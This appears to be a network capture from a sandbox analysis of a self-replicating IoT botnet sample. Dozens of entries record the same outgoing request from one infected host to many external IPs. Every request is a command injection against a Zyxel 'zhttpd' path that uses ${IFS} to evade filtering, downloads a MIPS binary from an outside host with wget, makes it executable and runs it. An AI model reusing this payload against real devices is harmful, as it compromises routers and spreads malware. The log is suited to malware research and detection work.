                                                Jan 12, 2024 18:16:27.561443090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5576192.168.2.233724234.2.74.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561472893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5577192.168.2.2352626205.69.131.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561527014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5578192.168.2.2355280168.151.31.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561566114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5579192.168.2.2353166103.34.124.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561620951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5580192.168.2.2344804121.138.215.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561657906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5581192.168.2.2348886205.201.198.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561682940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5582192.168.2.235419097.6.164.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561726093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5583192.168.2.2333504106.61.62.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561759949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5584192.168.2.2353114177.32.13.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561804056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5585192.168.2.2355734164.69.98.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561832905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5586192.168.2.235721449.18.146.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561875105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5587192.168.2.234556818.93.29.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561925888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5588192.168.2.233620693.213.183.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561939955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5589192.168.2.2340306153.207.213.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561969995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5590192.168.2.236006880.141.92.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.561996937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5591192.168.2.234146889.112.72.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562061071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5592192.168.2.2339256158.132.22.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562096119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5593192.168.2.2344160208.199.1.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562124014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5594192.168.2.2358984181.19.14.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562170982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5595192.168.2.234817075.177.118.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562216997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5596192.168.2.2349436126.37.167.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562263012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5597192.168.2.234314678.184.126.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562321901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5598192.168.2.2342498129.198.134.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562345982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5599192.168.2.234443475.26.37.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562397003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5600192.168.2.233778079.168.51.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562422037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5601192.168.2.233418276.184.142.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562448025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5602192.168.2.235134451.18.229.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562503099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5603192.168.2.235253477.62.203.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562539101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5604192.168.2.2349732176.224.246.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562582016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5605192.168.2.2348110192.71.150.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562619925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5606192.168.2.2354484105.167.101.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562661886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5607192.168.2.234896225.82.115.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562685966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5608192.168.2.2358590174.140.180.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562726021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5609192.168.2.2353122193.93.174.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562769890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5610192.168.2.2356902194.51.22.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562813044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5611192.168.2.2344944138.122.56.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562833071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5612192.168.2.2359814203.67.111.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562877893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5613192.168.2.236053423.237.148.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562926054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5614192.168.2.2344490148.224.6.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.562963963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5615192.168.2.235836290.46.75.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563014030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5616192.168.2.233546854.62.125.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563045025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5617192.168.2.233512053.124.67.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563076973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5618192.168.2.23401268.56.208.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563107967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5619192.168.2.234264869.11.33.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563168049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5620192.168.2.234709432.140.15.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563174963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5621192.168.2.2355570133.104.137.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563199997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5622192.168.2.2357150188.150.193.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563263893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5623192.168.2.233878667.233.82.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563294888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5624192.168.2.2355780177.236.165.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563347101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5625192.168.2.2355284130.198.41.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563378096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5626192.168.2.2349884101.170.238.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563406944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5627192.168.2.2343732178.152.209.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563432932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5628192.168.2.234287227.54.119.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563466072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5629192.168.2.235858886.157.214.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563524008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5630192.168.2.235994625.131.27.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563580990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5631192.168.2.235928265.11.9.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:27.563947916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5632192.168.2.234300088.155.139.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.573729992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5633192.168.2.235724837.153.119.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.573898077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5634192.168.2.235629067.253.184.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.573941946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5635192.168.2.2345872177.109.190.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574001074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5636192.168.2.234883472.132.48.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574067116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5637192.168.2.23487941.21.99.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574136019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5638192.168.2.2342410124.189.25.168443
                                                TimestampBytes transferredDirectionData
